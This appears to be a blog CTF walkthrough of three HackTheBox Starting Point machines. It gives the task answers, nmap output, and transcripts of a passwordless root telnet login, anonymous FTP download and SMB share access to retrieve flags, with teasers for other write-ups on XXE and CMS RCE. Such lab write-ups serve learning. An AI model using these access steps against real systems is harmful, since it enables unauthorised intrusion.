HackTheBox - Starting point (Tier 0)

-
Welcome file

This Blog post contain all Tier 0 HackTheBox Starting point all free machines. It will be Meow ,Fawn ,Dancing. First of all you need to download openvpn file for starting point.

Meow - Linux

Task 1

  • What does the acronym VM stand for? Virtual machine

Task 2

  • What tool do we use to interact with the operating system in order to start our VPN connection? Terminal

Task 3

  • What service do we use to form our VPN connection? Openvpn

Task 4

  • What is the abreviated name for a tunnel interface in the output of your VPN boot-up sequence output? Tun

Task 5

  • What tool do we use to test our connection to the target? Ping

Task 6

  • What is the name of the tool we use to scan the target’s ports? Nmap

Task 7

  • What service do we identify on port 23/tcp during our scans? Telenet
┌──(defalt@kali)-[~/Documents/htb/starting point /tier 0]
└─$ nmap -sC -sV 10.129.244.123

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 00:32 PDT
Nmap scan report for 10.129.244.123
Host is up (0.18s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.40 seconds

Task 8

  • What username ultimately works with the remote management login prompt for the target? root

Submit Flag

  • Submit root flag

┌──(defalt@kali)-[~/Documents/htb/starting point /tier 0]
└─$ telnet 10.129.244.123 1 ⨯
Trying 10.129.244.123...
Connected to 10.129.244.123.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
Last login: Fri Apr 8 07:39:36 UTC 2022 on pts/0
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c***************

Fawn - Linux

Task 1

  • What does the 3-letter acronym FTP stand for? File Transfer Protocol

Task 2

  • What communication model does FTP use, architecturally speaking? client-server model

Task 3

  • What is the name of one popular GUI FTP program? Filezilla

Task 4

  • Which port is the FTP service active on usually? 21 tcp
┌──(defalt@kali)-[~/Documents/htb/starting point /tier 0]
└─$ nmap -sC -sV 10.129.104.223
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 00:50 PDT
Nmap scan report for 10.129.104.223
Host is up (0.18s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.15.49
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.99 seconds

Task 5

  • What acronym is used for the secure version of FTP? SFTP (secure file transfer protocol)

Task 6

  • What is the command we can use to test our connection to the target? Ping

Task 7

  • From your scans, what version is FTP running on the target? vsftpd 3.0.3
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3

Task 8

  • From your scans, what OS type is running on the target? Unix
Service Info: OS: **Unix**

Submit Flag

Submit root flag

┌──(defalt@kali)-[~/Documents/htb/starting point /tier 1]
└─$ ftp 10.129.104.223
Connected to 10.129.104.223.
220 (vsFTPd 3.0.3)
Name (10.129.104.223:defalt): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||8784|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||26404|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |************************************************************************************************************************************************| 32 14.95 KiB/s 00:00 ETA

226 Transfer complete.
32 bytes received in 00:00 (0.17 KiB/s)
ftp> exit
221 Goodbye.

Dancing - Windows

Task 1

  • What does the 3-letter acronym SMB stand for? Server Message Block

Task 2

  • What port does SMB use to operate at? 445

Task 3

  • What network communication model does SMB use, architecturally speaking? client-server model

Task 4

  • What is the service name for port 445 that came up in our nmap scan? microsoft-ds
┌──(defalt@kali)-[~/Documents/htb/starting point /Tier 0]
└─$ nmap -sC -sV 10.129.1.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-10 02:29 PDT
Nmap scan report for 10.129.1.12
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-10T13:29:47
|_ start_date: N/A
|_clock-skew: 4h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 50.33 seconds

Task 5

  • What is the tool we use to connect to SMB shares from our Linux distribution? smbclient

Task 6

  • What is the flag or switch we can use with the SMB tool to list the contents of the share? -L
┌──(defalt@kali)-[~/Documents/htb/starting point /Tier 0]
└─$ smbclient -h

Usage: smbclient [-?EgqBVNkPeC] [-?|--help] [--usage] [-R|--name-resolve=NAME-RESOLVE-ORDER] [-M|--message=HOST] [-I|--ip-address=IP] [-E|--stderr] [-L|--list=HOST]
[-m|--max-protocol=LEVEL] [-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR] [-c|--command=STRING] [-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]
[-g|--grepable] [-q|--quiet] [-B|--browse] [-d|--debuglevel=DEBUGLEVEL] [-s|--configfile=CONFIGFILE] [-l|--log-basename=LOGFILEBASE] [-V|--version] [--option=name=value]
[-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME] [-W|--workgroup=WORKGROUP] [-i|--scope=SCOPE] [-U|--user=USERNAME] [-N|--no-pass] [-k|--kerberos]
[-A|--authentication-file=FILE] [-S|--signing=on|off|required] [-P|--machine-pass] [-e|--encrypt] [-C|--use-ccache] [--pw-nt-hash] service <password>

Task 7

  • What is the name of the share we are able to access in the end? workshares

Task 8

  • What is the command we can use within the SMB shell to download the files we find? get
┌──(defalt@kali)-[~/Documents/htb/starting point /Tier 0]
└─$ smbclient \\\\10.129.1.12\\WorkShares 1 ⨯
Enter WORKGROUP\defalt's password:
Try "help" to get a list of possible commands.
smb: \> help get
HELP get:
<remote name> [local name] get a file

Submit Flag

  • Submit root flag
smb: \> ls
. D 0 Mon Mar 29 01:22:01 2021
.. D 0 Mon Mar 29 01:22:01 2021
Amy.J D 0 Mon Mar 29 02:08:24 2021
James.P D 0 Thu Jun 3 01:38:03 2021
5114111 blocks of size 4096. 1748443 blocks available
smb: \>  cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 01:38:03 2021
.. D 0 Thu Jun 3 01:38:03 2021
flag.txt A 32 Mon Mar 29 02:26:57 2021
5114111 blocks of size 4096. 1752177 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

Thx for reading !! Have a nice day

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t...
Read more

Tech_Supp0rt: 1 - TryHackMe

-
Image
Welcome file Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine. nmap scan , smbmap etc. (enumeration skills) subrion cms 4.2.1 RCE iconv sudo permission to overwritten files and read the files Let’s start with enumeration. First with nmap to see what port we have in the box. Nmap scan ┌── ( defalt@kali ) - [ ~/Documents/tryhackme/Tech_Supp0rt:1 ] └─$ nmap -sC -sV 10.10.168.200 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT Nmap scan report for 10.10.168.20 Host is up ( 0.37s latency ) . Not shown: 996 closed tcp ports ( conn-refused ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 ( RSA ) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c ( ECDSA ) | _ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c ( ED25519 ) 80/tcp open http Apache ht...
Read more

Nmap - TryHackMe!

-
Image
nmap Task 2 What networking constructs are used to direct traffic to the right application on a server? ports How many of these are available on any network-enabled computer? 65535 [Research] How many of these are considered “well-known”? (These are the “standard” numbers mentioned in the task)? 1024 Task 3 What is the first switch listed in the help menu for a ‘Syn Scan’ (more on this later!)? -sS Which switch would you use for a “UDP scan”? -sU If you wanted to detect which operating system the target is running on, which switch would you use? -O Nmap provides a switch to detect the version of the services running on the target. What is this switch? -sV The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity? -v Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two? (Note: it’s highly advisable to a...
Read more